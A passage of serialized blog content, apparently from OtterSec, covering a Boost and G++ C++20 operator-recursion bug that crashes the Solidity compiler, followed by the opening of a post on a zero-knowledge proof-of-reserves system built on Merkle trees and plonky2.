a.operator==(b);\n}\n",[94441],{"type":26,"tag":130,"props":94442,"children":94443},{"__ignoreMap":7},[94444,94452,94459,94467,94475,94483,94490,94498,94506],{"type":26,"tag":137,"props":94445,"children":94446},{"class":5559,"line":5560},[94447],{"type":26,"tag":137,"props":94448,"children":94449},{"style":5601},[94450],{"type":32,"value":94451},"template \u003Cclass Arg, class IntType>\n",{"type":26,"tag":137,"props":94453,"children":94454},{"class":5559,"line":5412},[94455],{"type":26,"tag":137,"props":94456,"children":94457},{"style":5601},[94458],{"type":32,"value":94068},{"type":26,"tag":137,"props":94460,"children":94461},{"class":5559,"line":5417},[94462],{"type":26,"tag":137,"props":94463,"children":94464},{"style":5601},[94465],{"type":32,"value":94466},"inline typename boost::enable_if_c \u003C\n",{"type":26,"tag":137,"props":94468,"children":94469},{"class":5559,"line":5642},[94470],{"type":26,"tag":137,"props":94471,"children":94472},{"style":5601},[94473],{"type":32,"value":94474},"   rational_detail::is_compatible_integer\u003CArg, IntType>::value, bool>::type\n",{"type":26,"tag":137,"props":94476,"children":94477},{"class":5559,"line":5745},[94478],{"type":26,"tag":137,"props":94479,"children":94480},{"style":5601},[94481],{"type":32,"value":94482},"   operator == (const Arg& b, const rational\u003CIntType>& a)\n",{"type":26,"tag":137,"props":94484,"children":94485},{"class":5559,"line":5850},[94486],{"type":26,"tag":137,"props":94487,"children":94488},{"style":5601},[94489],{"type":32,"value":13471},{"type":26,"tag":137,"props":94491,"children":94492},{"class":5559,"line":5878},[94493],{"type":26,"tag":137,"props":94494,"children":94495},{"style":6837},[94496],{"type":32,"value":94497},"-     return a == b;\n",{"type":26,"tag":137,"props":94499,"children":94500},{"class":5559,"line":5891},[94501],{"type":26,"tag":137,"props":94502,"children":94503},{"style":5626},[94504],{"type":32,"value":94505},"+     return a.operator==(b);\n",{"type":26,"tag":137,"props":94507,"children":94508},{"class":5559,"line":5909},[94509],{"type":26,"tag":137,"props":94510,"children":94511},{"style":5601},[94512],{"type":32,"value":6507},{"type":26,"tag":35,"props":94514,"children":94515},{},[94516,94518,94523,94525,94530],{"type":32,"value":94517},"Instead of calling ",{"type":26,"tag":130,"props":94519,"children":94521},{"className":94520},[],[94522],{"type":32,"value":92849},{"type":32,"value":94524}," — which triggers overload resolution again — the patched version directly calls the member function ",{"type":26,"tag":130,"props":94526,"children":94528},{"className":94527},[],[94529],{"type":32,"value":92857},{"type":32,"value":470},{"type":26,"tag":35,"props":94532,"children":94533},{},[94534],{"type":32,"value":94535},"This prevents C++20 from triggering recursive rewrites.",{"type":26,"tag":3265,"props":94537,"children":94538},{},[],{"type":26,"tag":92,"props":94540,"children":94542},{"id":94541},"part-iv-how-this-breaks-solidity",[94543],{"type":32,"value":94544},"Part IV: How This Breaks Solidity",{"type":26,"tag":35,"props":94546,"children":94547},{},[94548,94550,94555],{"type":32,"value":94549},"The Solidity codebase uses ",{"type":26,"tag":130,"props":94551,"children":94553},{"className":94552},[],[94554],{"type":32,"value":92704},{"type":32,"value":94556}," to represent certain compile-time constant expressions.",{"type":26,"tag":35,"props":94558,"children":94559},{},[94560,94562,94568],{"type":32,"value":94561},"One snippet that can trigger this issue appears in ",{"type":26,"tag":130,"props":94563,"children":94565},{"className":94564},[],[94566],{"type":32,"value":94567},"DeclarationTypeChecker::endVisit",{"type":32,"value":7072},{"type":26,"tag":5512,"props":94570,"children":94572},{"code":94571,"language":31706,"meta":7,"className":31704,"style":7},"if (Expression const* length = _typeName.length()) {\n    std::optional\u003Crational> lengthValue;\n\n    if (length->annotation().type && length->annotation().type->category() == Type::Category::RationalNumber)\n        ...\n    else if (std::optional\u003CConstantEvaluator::TypedRational> value = ConstantEvaluator::evaluate(...))\n        lengthValue = value->value;\n\n    if (!lengthValue)\n        ...\n    else if (*lengthValue == 0)  // \u003C-- Infinite recursion happens here\n        ...\n}\n",[94573],{"type":26,"tag":130,"props":94574,"children":94575},{"__ignoreMap":7},[94576,94623,94648,94655,94733,94740,94793,94821,94828,94848,94855,94895,94902],{"type":26,"tag":137,"props":94577,"children":94578},{"class":5559,"line":5560},[94579,94583,94588,94592,94596,94601,94605,94610,94614,94618],{"type":26,"tag":137,"props":94580,"children":94581},{"style":5610},[94582],{"type":32,"value":18171},{"type":26,"tag":137,"props":94584,"children":94585},{"style":5601},[94586],{"type":32,"value":94587}," (Expression ",{"type":26,"tag":137,"props":94589,"children":94590},{"style":5573},[94591],{"type":32,"value":12244},{"type":26,"tag":137,"props":94593,"children":94594},{"style":5590},[94595],{"type":32,"value":7152},{"type":26,"tag":137,"props":94597,"children":94598},{"style":5601},[94599],{"type":32,"value":94600}," length ",{"type":26,"tag":137,"props":94602,"children":94603},{"style":5590},[94604],{"type":32,"value":289},{"type":26,"tag":137,"props":94606,"children":94607},{"style":5584},[94608],{"type":32,"value":94609}," _typeName",{"type":26,"tag":137,"props":94611,"children":94612},{"style":5601},[94613],{"type":32,"value":470},{"type":26,"tag":137,"props":94615,"children":94616},{"style":5682},[94617],{"type":32,"value":11089},{"type":26,"tag":137,"props":94619,"children":94620},{"style":5601},[94621],{"type":32,"value":94622},"()) {\n",{"type":26,"tag":137,"props":94624,"children":94625},{"class":5559,"line":5412},[94626,94631,94635,94639,94643],{"type":26,"tag":137,"props":94627,"children":94628},{"style":5601},[94629],{"type":32,"value":94630},"    std::optional",{"type":26,"tag":137,"props":94632,"children":94633},{"style":5590},[94634],{"type":32,"value":8391},{"type":26,"tag":137,"props":94636,"children":94637},{"style":5601},[94638],{"type":32,"value":93708},{"type":26,"tag":137,"props":94640,"children":94641},{"style":5590},[94642],{"type":32,"value":13052},{"type":26,"tag":137,"props":94644,"children":94645},{"style":5601},[94646],{"type":32,"value":94647}," lengthValue;\n",{"type":26,"tag":137,"props":94649,"children":94650},{"class":5559,"line":5417},[94651],{"type":26,"tag":137,"props":94652,"children":94653},{"emptyLinePlaceholder":18},[94654],{"type":32,"value":6276},{"type":26,"tag":137,"props":94656,"children":94657},{"class":5559,"line":5642},[94658,94662,94666,94670,94674,94678,94682,94686,94690,94695,94699,94703,94707,94711,94715,94720,94724,94728],{"type":26,"tag":137,"props":94659,"children":94660},{"style":5610},[94661],{"type":32,"value":14870},{"type":26,"tag":137,"props":94663,"children":94664},{"style":5601},[94665],{"type":32,"value":4625},{"type":26,"tag":137,"props":94667,"children":94668},{"style":5584},[94669],{"type":32,"value":11089},{"type":26,"tag":137,"props":94671,"children":94672},{"style":5601},[94673],{"type":32,"value":16348},{"type":26,"tag":137,"props":94675,"children":94676},{"style":5682},[94677],{"type":32,"value":32757},{"type":26,"tag":137,"props":94679,"children":94680},{"style":5601},[94681],{"type":32,"value":32762},{"type":26,"tag":137,"props":94683,"children":94684},{"style":5584},[94685],{"type":32,"value":35352},{"type":26,"tag":137,"props":94687,"children":94688},{"style":5590},[94689],{"type":32,"value":16776},{"type":26,"tag":137,"props":94691,"children":94692},{"style":5584},[94693],{"type":32,"value":94694}," length",{"type":26,"tag":137,"props":94696,"children":94697},{"style":5601},[94698],{"type":32,"value":16348},{"type":26,"tag":137,"props":94700,"children":94701},{"style":5682},[94702],{"type":32,"value":32757},{"type":26,"tag":137,"props":94704,"children":94705},{"style":5601},[94706],{"type":32,"value":32762},{"type":26,"tag":137,"props":94708,"children":94709},{"style":5584},[94710],{"type":32,"value":35352},{"type":26,"tag":137,"props":94712,"children":94713},{"style":5601},[94714],{"type":32,"value":16348},{"type":26,"tag":137,"props":94716,"children":94717},{"style":5682},[94718],{"type":32,"value":94719},"category",{"type":26,"tag":137,"props":94721,"children":94722},{"style":5601},[94723],{"type":32,"value":16634},{"type":26,"tag":137,"props":94725,"children":94726},{"style":5590},[94727],{"type":32,"value":11161},{"type":26,"tag":137,"props":94729,"children":94730},{"style":5601},[94731],{"type":32,"value":94732}," Type::Category::RationalNumber)\n",{"type":26,"tag":137,"props":94734,"children":94735},{"class":5559,"line":5745},[94736],{"type":26,"tag":137,"props":94737,"children":94738},{"style":5601},[94739],{"type":32,"value":84444},{"type":26,"tag":137,"props":94741,"children":94742},{"class":5559,"line":5850},[94743,94748,94752,94757,94761,94766,94770,94775,94779,94784,94788],{"type":26,"tag":137,"props":94744,"children":94745},{"style":5610},[94746],{"type":32,"value":94747},"    else",{"type":26,"tag":137,"props":94749,"children":94750},{"style":5610},[94751],{"type":32,"value":18380},{"type":26,"tag":137,"props":94753,"children":94754},{"style":5601},[94755],{"type":32,"value":94756}," (std::optional",{"type":26,"tag":137,"props":94758,"children":94759},{"style":5590},[94760],{"type":32,"value":8391},{"type":26,"tag":137,"props":94762,"children":94763},{"style":5601},[94764],{"type":32,"value":94765},"ConstantEvaluator::TypedRational",{"type":26,"tag":137,"props":94767,"children":94768},{"style":5590},[94769],{"type":32,"value":13052},{"type":26,"tag":137,"props":94771,"children":94772},{"style":5601},[94773],{"type":32,"value":94774}," value ",{"type":26,"tag":137,"props":94776,"children":94777},{"style":5590},[94778],{"type":32,"value":289},{"type":26,"tag":137,"props":94780,"children":94781},{"style":5601},[94782],{"type":32,"value":94783}," ConstantEvaluator::",{"type":26,"tag":137,"props":94785,"children":94786},{"style":5682},[94787],{"type":32,"value":40601},{"type":26,"tag":137,"props":94789,"children":94790},{"style":5601},[94791],{"type":32,"value":94792},"(...))\n",{"type":26,"tag":137,"props":94794,"children":94795},{"class":5559,"line":5878},[94796,94801,94805,94809,94813,94817],{"type":26,"tag":137,"props":94797,"children":94798},{"style":5601},[94799],{"type":32,"value":94800},"        lengthValue ",{"type":26,"tag":137,"props":94802,"children":94803},{"style":5590},[94804],{"type":32,"value":289},{"type":26,"tag":137,"props":94806,"children":94807},{"style":5584},[94808],{"type":32,"value":35106},{"type":26,"tag":137,"props":94810,"children":94811},{"style":5601},[94812],{"type":32,"value":16348},{"type":26,"tag":137,"props":94814,"children":94815},{"style":5584},[94816],{"type":32,"value":41748},{"type":26,"tag":137,"props":94818,"children":94819},{"style":5601},[94820],{"type":32,"value":5604},{"type":26,"tag":137,"props":94822,"children":94823},{"class":5559,"line":5891},[94824],{"type":26,"tag":137,"props":94825,"children":94826},{"emptyLinePlaceholder":18},[94827],{"type":32,"value":6276},{"type":26,"tag":137,"props":94829,"children":94830},{"class":5559,"line":5909},[94831,94835,94839,94843],{"type":26,"tag":137,"props":94832,"children":94833},{"style":5610},[94834],{"type":32,"value":14870},{"type":26,"tag":137,"props":94836,"children":94837},{"style":5601},[94838],{"type":32,"value":4625},{"type":26,"tag":137,"props":94840,"children":94841},{"style":5590},[94842],{"type":32,"value":23215},{"type":26,"tag":137,"props":94844,"children":94845},{"style":5601},[94846],{"type":32,"value":94847},"lengthValue)\n",{"type":26,"tag":137,"props":94849,"children":94850},{"class":5559,"line":5930},[94851],{"type":26,"tag":137,"props":94852,"children":94853},{"style":5601},[94854],{"type":32,"value":84444},{"type":26,"tag":137,"props":94856,"children":94857},{"class":5559,"line":5939},[94858,94862,94866,94870,94874,94878,94882,94886,94890],{"type":26,"tag":137,"props":94859,"children":94860},{"style":5610},[94861],{"type":32,"value":94747},{"type":26,"tag":137,"props":94863,"children":94864},{"style":5610},[94865],{"type":32,"value":18380},{"type":26,"tag":137,"props":94867,"children":94868},{"style":5601},[94869],{"type":32,"value":4625},{"type":26,"tag":137,"props":94871,"children":94872},{"style":5590},[94873],{"type":32,"value":7152},{"type":26,"tag":137,"props":94875,"children":94876},{"style":5601},[94877],{"type":32,"value":92680},{"type":26,"tag":137,"props":94879,"children":94880},{"style":5590},[94881],{"type":32,"value":11161},{"type":26,"tag":137,"props":94883,"children":94884},{"style":5626},[94885],{"type":32,"value":5629},{"type":26,"tag":137,"props":94887,"children":94888},{"style":5601},[94889],{"type":32,"value":200},{"type":26,"tag":137,"props":94891,"children":94892},{"style":5564},[94893],{"type":32,"value":94894},"  // \u003C-- Infinite recursion happens here\n",{"type":26,"tag":137,"props":94896,"children":94897},{"class":5559,"line":6191},[94898],{"type":26,"tag":137,"props":94899,"children":94900},{"style":5601},[94901],{"type":32,"value":84444},{"type":26,"tag":137,"props":94903,"children":94904},{"class":5559,"line":6208},[94905],{"type":26,"tag":137,"props":94906,"children":94907},{"style":5601},[94908],{"type":32,"value":6507},{"type":26,"tag":35,"props":94910,"children":94911},{},[94912],{"type":32,"value":94913},"Under normal circumstances, this expression is benign. But:",{"type":26,"tag":3426,"props":94915,"children":94916},{},[94917,94922,94927],{"type":26,"tag":3430,"props":94918,"children":94919},{},[94920],{"type":32,"value":94921},"G++ \u003C 14 wrongly prefers Boost's non-member operator",{"type":26,"tag":3430,"props":94923,"children":94924},{},[94925],{"type":32,"value":94926},"C++20 reverses the arguments",{"type":26,"tag":3430,"props":94928,"children":94929},{},[94930],{"type":32,"value":94931},"The non-member operator recursively calls itself",{"type":26,"tag":35,"props":94933,"children":94934},{},[94935],{"type":32,"value":94936},"💥: segmentation fault.",{"type":26,"tag":3265,"props":94938,"children":94939},{},[],{"type":26,"tag":92,"props":94941,"children":94943},{"id":94942},"part-v-what-environments-are-affected",[94944],{"type":32,"value":94945},"Part V: What Environments are Affected?",{"type":26,"tag":35,"props":94947,"children":94948},{},[94949],{"type":32,"value":94950},"If a system uses any of the following:",{"type":26,"tag":3426,"props":94952,"children":94953},{},[94954,94959,94964],{"type":26,"tag":3430,"props":94955,"children":94956},{},[94957],{"type":32,"value":94958},"G++ \u003C 14 (e.g., Ubuntu 22.04 uses 11.4)",{"type":26,"tag":3430,"props":94960,"children":94961},{},[94962],{"type":32,"value":94963},"Boost \u003C 1.75 (e.g., 1.74 ships with Ubuntu)",{"type":26,"tag":3430,"props":94965,"children":94966},{},[94967],{"type":32,"value":94968},"C++20 enabled (default in recent Solidity builds)",{"type":26,"tag":35,"props":94970,"children":94971},{},[94972,94974,94979,94981,94987],{"type":32,"value":94973},"They will encounter this crash ",{"type":26,"tag":84,"props":94975,"children":94976},{},[94977],{"type":32,"value":94978},"as soon as",{"type":32,"value":94980}," it processes a Solidity source with a length expression like ",{"type":26,"tag":130,"props":94982,"children":94984},{"className":94983},[],[94985],{"type":32,"value":94986},"T[0]",{"type":32,"value":94988}," or anything involving compile-time rational comparisons.",{"type":26,"tag":3265,"props":94990,"children":94991},{},[],{"type":26,"tag":92,"props":94993,"children":94995},{"id":94994},"recommendations",[94996],{"type":32,"value":94997},"Recommendations",{"type":26,"tag":3426,"props":94999,"children":95000},{},[95001,95009],{"type":26,"tag":3430,"props":95002,"children":95003},{},[95004],{"type":26,"tag":84,"props":95005,"children":95006},{},[95007],{"type":32,"value":95008},"Update Boost to ≥ 1.75",{"type":26,"tag":3430,"props":95010,"children":95011},{},[95012],{"type":26,"tag":84,"props":95013,"children":95014},{},[95015],{"type":32,"value":95016},"Pin G++ to v14 or later",{"type":26,"tag":3265,"props":95018,"children":95019},{},[],{"type":26,"tag":92,"props":95021,"children":95022},{"id":31526},[95023],{"type":32,"value":21540},{"type":26,"tag":35,"props":95025,"children":95026},{},[95027],{"type":32,"value":95028},"This isn’t a security vulnerability. It doesn’t corrupt memory or allow code execution.",{"type":26,"tag":35,"props":95030,"children":95031},{},[95032,95034,95038],{"type":32,"value":95033},"But it ",{"type":26,"tag":84,"props":95035,"children":95036},{},[95037],{"type":32,"value":6582},{"type":32,"value":95039}," a reminder of the fragility of modern build stacks. A bug introduced in 2012, fixed in 2024, quietly broke one of the most used blockchain compiler toolchains — all without any code in the Solidity repo being “wrong.”",{"type":26,"tag":35,"props":95041,"children":95042},{},[95043],{"type":32,"value":95044},"Every layer here — Boost, G++, the C++20 spec, and Solidity — behaved “as documented.” But together, they composed into undefined behavior.",{"type":26,"tag":35,"props":95046,"children":95047},{},[95048],{"type":32,"value":95049},"The lesson? Always test critical software under multiple compilers and library versions — especially when enabling a new language standard.",{"type":26,"tag":7949,"props":95051,"children":95052},{},[95053],{"type":32,"value":7953},{"title":7,"searchDepth":5412,"depth":5412,"links":95055},[95056,95057,95062,95065,95066,95067,95068,95069],{"id":92740,"depth":5412,"text":92743},{"id":92829,"depth":5412,"text":92832,"children":95058},[95059,95060,95061],{"id":92835,"depth":5417,"text":92838},{"id":4058,"depth":5417,"text":92905},{"id":92993,"depth":5417,"text":92996},{"id":93577,"depth":5412,"text":93580,"children":95063},[95064],{"id":93583,"depth":5417,"text":93586},{"id":93694,"depth":5412,"text":93697},{"id":94541,"depth":5412,"text":94544},{"id":94942,"depth":5412,"text":94945},{"id":94994,"depth":5412,"text":94997},{"id":31526,"depth":5412,"text":21540},"content:blog:2025-08-11-compiler-bug-causes-compiler-bug.md","blog/2025-08-11-compiler-bug-causes-compiler-bug.md","blog/2025-08-11-compiler-bug-causes-compiler-bug",{"_path":95074,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":95075,"description":95076,"date":95077,"author":33795,"image":95078,"isFeatured":18,"onBlogPage":18,"tags":95080,"body":95083,"_type":5433,"_id":99840,"_source":5435,"_file":99841,"_stem":99842,"_extension":5438},"/blog/2025-08-27-how-proof-of-reserves-uses-zk-to-protect-your-funds","PoRv2: A Fast, Transparent ZK-Based Proof of Reserves","Here, we explore zk-proofs, Merkle trees, and our new open-source implementation, PoRv2. Our proof-of-reserve enables users to verify exchange liabilities without relying on external auditors, setting a new standard for trust.","2025-08-27",{"src":95079,"width":17,"height":17},"/posts/por/title.png",[95081,95082],"zk","por",{"type":23,"children":95084,"toc":99817},[95085,95091,95103,95115,95120,95152,95166,95172,95184,95189,95194,95231,95236,95242,95247,95254,95259,95285,95290,95296,95316,95330,95338,95343,95348,95356,95369,95375,95457,95463,95468,95481,95486,95493,95517,95525,95530,95536,95541,95980,95993,95999,96004,96012,96030,96038,96051,96059,97712,97717,97724,97730,97735,97742,97758,97765,97773,97780,99289,99294,99301,99307,99312,99339,99344,99363,99369,99377,99395,99444,99452,99471,99493,99499,99512,99517,99524,99529,99592,99597,99604,99624,99630,99635,99641,99646,99690,99695,99703,99709,99714,99756,99761,99769,99774,99782,99786,99791,99804],{"type":26,"tag":92,"props":95086,"children":95088},{"id":95087},"what-is-a-proof-of-reserves",[95089],{"type":32,"value":95090},"What is a Proof of Reserves?",{"type":26,"tag":35,"props":95092,"children":95093},{},[95094,95096,95101],{"type":32,"value":95095},"At its heart, ",{"type":26,"tag":84,"props":95097,"children":95098},{},[95099],{"type":32,"value":95100},"Proof of Reserves (PoR)",{"type":32,"value":95102}," is a crucial system designed to show that a crypto platform genuinely holds the funds it owes to its users. It's how exchanges and custodians can prove, using strong cryptographic methods, that they have enough assets to cover all customer deposits.",{"type":26,"tag":35,"props":95104,"children":95105},{},[95106,95108,95113],{"type":32,"value":95107},"Think of it this way: ",{"type":26,"tag":84,"props":95109,"children":95110},{},[95111],{"type":32,"value":95112},"PoR",{"type":32,"value":95114}," is about enabling transparency. It's a way for platforms to provide clear, verifiable evidence of their financial health. For users, it means gaining confidence that their funds are secure on the platforms they use.",{"type":26,"tag":35,"props":95116,"children":95117},{},[95118],{"type":32,"value":95119},"Historically, traditional ways of proving reserves often had drawbacks. They might reveal too much sensitive information about the platform and rely heavily on external auditors without a direct user verification method.",{"type":26,"tag":35,"props":95121,"children":95122},{},[95123,95125,95132,95134,95141,95143,95150],{"type":32,"value":95124},"We from OtterSec, in partnership with ",{"type":26,"tag":41,"props":95126,"children":95129},{"href":95127,"rel":95128},"https://backpack.exchange/",[45],[95130],{"type":32,"value":95131},"Backpack",{"type":32,"value":95133},", just developed a Proof of Reserves system that can be used to prove CEX solvency. Our ",{"type":26,"tag":41,"props":95135,"children":95138},{"href":95136,"rel":95137},"https://github.com/otter-sec/por_v2",[45],[95139],{"type":32,"value":95140},"Zero-Knowledge Proof of Reserves (PoRv2)",{"type":32,"value":95142}," was based on ",{"type":26,"tag":41,"props":95144,"children":95147},{"href":95145,"rel":95146},"https://www.okx.com/en-eu/help/zero-knowledge-proofs-what-are-zk-starks-and-how-do-they-work-v2",[45],[95148],{"type":32,"value":95149},"OKX Proof of Reserves algorithm",{"type":32,"value":95151}," since it was the fastest and most efficient one known so far. We also use recursive plonky2 as the algorithm for zero-knowledge proving, but we made some improvements to the circuits for more transparency and verifiable information on the user side, eliminating the need to trust the audit company.",{"type":26,"tag":35,"props":95153,"children":95154},{},[95155,95157,95164],{"type":32,"value":95156},"In addition, we also created and open-sourced a ",{"type":26,"tag":41,"props":95158,"children":95161},{"href":95159,"rel":95160},"https://github.com/otter-sec/por_verifier_server",[45],[95162],{"type":32,"value":95163},"PoR verifier server",{"type":32,"value":95165}," that receives the proofs and validates them.",{"type":26,"tag":92,"props":95167,"children":95169},{"id":95168},"why-do-we-use-zk-for-por",[95170],{"type":32,"value":95171},"Why do we use ZK for PoR?",{"type":26,"tag":35,"props":95173,"children":95174},{},[95175,95177,95182],{"type":32,"value":95176},"Proving reserves is crucial, but it presents a unique challenge for any platform holding user funds: how do you publicly prove solvency without also exposing sensitive user balance information or revealing proprietary financial details? This is where ",{"type":26,"tag":84,"props":95178,"children":95179},{},[95180],{"type":32,"value":95181},"Zero-Knowledge Proofs (ZKPs)",{"type":32,"value":95183}," become game-changers.",{"type":26,"tag":35,"props":95185,"children":95186},{},[95187],{"type":32,"value":95188},"Simply put, a Zero-Knowledge Proof allows one party to prove to another that a statement is true without revealing any information beyond the validity of the statement itself. Imagine proving you know a secret password without actually telling anyone the password. You confirm you possess the knowledge, but the secret remains yours.",{"type":26,"tag":35,"props":95190,"children":95191},{},[95192],{"type":32,"value":95193},"In the context of Proof of Reserves, ZKPs are perfectly suited to solve the privacy paradox. They enable a platform to prove two important things cryptographically:",{"type":26,"tag":4820,"props":95195,"children":95196},{},[95197,95214],{"type":26,"tag":3430,"props":95198,"children":95199},{},[95200,95205,95207,95213],{"type":26,"tag":84,"props":95201,"children":95202},{},[95203],{"type":32,"value":95204},"Sum proof",{"type":32,"value":95206},": The exchange liability is equal to the sum of all users' balances. (e.g: ",{"type":26,"tag":130,"props":95208,"children":95210},{"className":95209},[],[95211],{"type":32,"value":95212},"btc_liability = user1_btc + user2_btc + user3_btc + ...",{"type":32,"value":4437},{"type":26,"tag":3430,"props":95215,"children":95216},{},[95217,95222,95224,95229],{"type":26,"tag":84,"props":95218,"children":95219},{},[95220],{"type":32,"value":95221},"Non-negativity",{"type":32,"value":95223},": All users have a ",{"type":26,"tag":84,"props":95225,"children":95226},{},[95227],{"type":32,"value":95228},"positive",{"type":32,"value":95230}," net balance. This ensures that the sum proof is not tampered with by users with negative net balances. A user can have negative asset balances (e.g., borrowing BTC) but only if collateralized with other assets.",{"type":26,"tag":35,"props":95232,"children":95233},{},[95234],{"type":32,"value":95235},"It is worth noting that we cannot guarantee that all users were included in the ZK analysis. Therefore, if we only used ZKPs to prove those two statements, the exchange could tamper with the sum proof by excluding users from the PoR. That's why we also use a Merkle tree to prove inclusions.",{"type":26,"tag":92,"props":95237,"children":95239},{"id":95238},"what-is-a-merkle-tree-and-how-does-it-help-in-a-por",[95240],{"type":32,"value":95241},"What is a Merkle Tree and how does it help in a PoR?",{"type":26,"tag":35,"props":95243,"children":95244},{},[95245],{"type":32,"value":95246},"A Merkle tree is a tree data structure where each leaf node is a cryptographic hash of an individual piece of data (like a user's balance), and every non-leaf node is a cryptographic hash of its child nodes. This structure allows for the entire dataset to be summarized by a single, unique hash at the top, called the Merkle Root.",{"type":26,"tag":35,"props":95248,"children":95249},{},[95250],{"type":26,"tag":2210,"props":95251,"children":95253},{"alt":53181,"src":95252},"/posts/por/merkle-tree.png",[],{"type":26,"tag":35,"props":95255,"children":95256},{},[95257],{"type":32,"value":95258},"In the PoR, we can use a Merkle tree to verify the inclusion of each user in the Proof of Reserves. It works like this:",{"type":26,"tag":4820,"props":95260,"children":95261},{},[95262,95275,95280],{"type":26,"tag":3430,"props":95263,"children":95264},{},[95265,95267,95273],{"type":32,"value":95266},"The Merkle tree is generated using the leaf nodes as the hashes of the user information (e.g., ",{"type":26,"tag":130,"props":95268,"children":95270},{"className":95269},[],[95271],{"type":32,"value":95272},"sha256({id: 1, balances: {\"BTC\": 0.1, \"ETH\": 0.2, ...}})",{"type":32,"value":95274},");",{"type":26,"tag":3430,"props":95276,"children":95277},{},[95278],{"type":32,"value":95279},"The Merkle tree is made public;",{"type":26,"tag":3430,"props":95281,"children":95282},{},[95283],{"type":32,"value":95284},"Each user can download the Merkle tree and check if their account was included by hashing their account information and checking if the hash is one of the leaves;",{"type":26,"tag":35,"props":95286,"children":95287},{},[95288],{"type":32,"value":95289},"In other words, this use of the Merkle tree allows users to easily verify that their individual balance was included in the overall total.",{"type":26,"tag":92,"props":95291,"children":95293},{"id":95292},"ottersec-porv2",[95294],{"type":32,"value":95295},"OtterSec PoRv2",{"type":26,"tag":35,"props":95297,"children":95298},{},[95299,95305,95307,95314],{"type":26,"tag":41,"props":95300,"children":95302},{"href":95136,"rel":95301},[45],[95303],{"type":32,"value":95304},"We just open-sourced our Proof of Reserves code (PoRv2)",{"type":32,"value":95306},", which uses the ",{"type":26,"tag":41,"props":95308,"children":95311},{"href":95309,"rel":95310},"https://github.com/0xPolygonZero/plonky2",[45],[95312],{"type":32,"value":95313},"plonky2 ZK algorithm",{"type":32,"value":95315}," to create a Merkle tree and a final ZK proof that recursively verifies smaller sum and non-negativity proofs.",{"type":26,"tag":35,"props":95317,"children":95318},{},[95319,95321,95328],{"type":32,"value":95320},"We named it PoRv2 because we already had a version based on ",{"type":26,"tag":41,"props":95322,"children":95325},{"href":95323,"rel":95324},"https://vitalik.eth.limo/general/2022/11/19/proof_of_solvency.html",[45],[95326],{"type":32,"value":95327},"Vitalik's proof of solvency",{"type":32,"value":95329},", which was not optimal.",{"type":26,"tag":35,"props":95331,"children":95332},{},[95333],{"type":26,"tag":84,"props":95334,"children":95335},{},[95336],{"type":32,"value":95337},"Non-negativity Proof",{"type":26,"tag":35,"props":95339,"children":95340},{},[95341],{"type":32,"value":95342},"In our non-negativity proof, the circuit receives the asset balances of each user and the price of each asset. With these inputs, it calculates the account's USD balance and checks if it is greater than 0.",{"type":26,"tag":35,"props":95344,"children":95345},{},[95346],{"type":32,"value":95347},"We also check for overflows during summation to prevent tampering in the final result.",{"type":26,"tag":35,"props":95349,"children":95350},{},[95351],{"type":26,"tag":84,"props":95352,"children":95353},{},[95354],{"type":32,"value":95355},"Sum Proof",{"type":26,"tag":35,"props":95357,"children":95358},{},[95359,95361,95367],{"type":32,"value":95360},"The sum proof verifies a public circuit input that was calculated by summing up all user balances of each asset. (e.g., ",{"type":26,"tag":130,"props":95362,"children":95364},{"className":95363},[],[95365],{"type":32,"value":95366},"BTC final: user1_btc + user2_btc ...",{"type":32,"value":95368},"). Note that each asset's final sum is not USD-based; we calculate the final balance using the asset balance itself.",{"type":26,"tag":118,"props":95370,"children":95372},{"id":95371},"what-are-the-ottersec-porv2-key-points",[95373],{"type":32,"value":95374},"What are the OtterSec PoRv2 key points?",{"type":26,"tag":4820,"props":95376,"children":95377},{},[95378,95388,95406,95416,95447],{"type":26,"tag":3430,"props":95379,"children":95380},{},[95381,95386],{"type":26,"tag":84,"props":95382,"children":95383},{},[95384],{"type":32,"value":95385},"Transparency",{"type":32,"value":95387},": It is possible for the exchange to safely disclose the entire Merkle tree so users can verify it without the need for an external auditing company. Also, the code allows asset price commitments and verifications.",{"type":26,"tag":3430,"props":95389,"children":95390},{},[95391,95396,95398,95405],{"type":26,"tag":84,"props":95392,"children":95393},{},[95394],{"type":32,"value":95395},"Time-efficiency",{"type":32,"value":95397},": We were able to reduce the amount of time to prove by more than 100 times from our previous version by generating proofs for 750,000 users within 8 minutes using a Mac M3 Pro. ",{"type":26,"tag":41,"props":95399,"children":95402},{"href":95400,"rel":95401},"https://github.com/otter-sec/por_v2?tab=readme-ov-file#benchmark",[45],[95403],{"type":32,"value":95404},"Check our benchmark",{"type":32,"value":470},{"type":26,"tag":3430,"props":95407,"children":95408},{},[95409,95414],{"type":26,"tag":84,"props":95410,"children":95411},{},[95412],{"type":32,"value":95413},"Memory-efficiency",{"type":32,"value":95415},": We also were able to reduce the amount of RAM needed to prove the liabilities of millions of users. Now, we are able to use machines with 16GB.",{"type":26,"tag":3430,"props":95417,"children":95418},{},[95419,95424,95426,95431,95433,95438,95440,95445],{"type":26,"tag":84,"props":95420,"children":95421},{},[95422],{"type":32,"value":95423},"Small-proofs",{"type":32,"value":95425},": We were able to reduce the final proof to less than ",{"type":26,"tag":84,"props":95427,"children":95428},{},[95429],{"type":32,"value":95430},"500KB",{"type":32,"value":95432}," and each inclusion proof to ",{"type":26,"tag":84,"props":95434,"children":95435},{},[95436],{"type":32,"value":95437},"~52KB",{"type":32,"value":95439},". The only big file that we need to store is the Merkle tree, which doesn't consume more than ",{"type":26,"tag":84,"props":95441,"children":95442},{},[95443],{"type":32,"value":95444},"200MB",{"type":32,"value":95446}," if the PoR parameters are finely adjusted. Additionally, instead of storing each inclusion proof in a static file, we provide an efficient method to generate inclusion proofs on demand, eliminating the need for the exchange to store millions of files and conserve disk space and resources.",{"type":26,"tag":3430,"props":95448,"children":95449},{},[95450,95455],{"type":26,"tag":84,"props":95451,"children":95452},{},[95453],{"type":32,"value":95454},"Privacy",{"type":32,"value":95456},": We use many cryptographic mechanisms to ensure that the user balances and other private information are kept safe and secret.",{"type":26,"tag":92,"props":95458,"children":95460},{"id":95459},"zk-circuits",[95461],{"type":32,"value":95462},"ZK Circuits",{"type":26,"tag":35,"props":95464,"children":95465},{},[95466],{"type":32,"value":95467},"We use two different ZK circuits to generate the final proof:",{"type":26,"tag":4820,"props":95469,"children":95470},{},[95471,95476],{"type":26,"tag":3430,"props":95472,"children":95473},{},[95474],{"type":32,"value":95475},"Batch circuit",{"type":26,"tag":3430,"props":95477,"children":95478},{},[95479],{"type":32,"value":95480},"Recursive 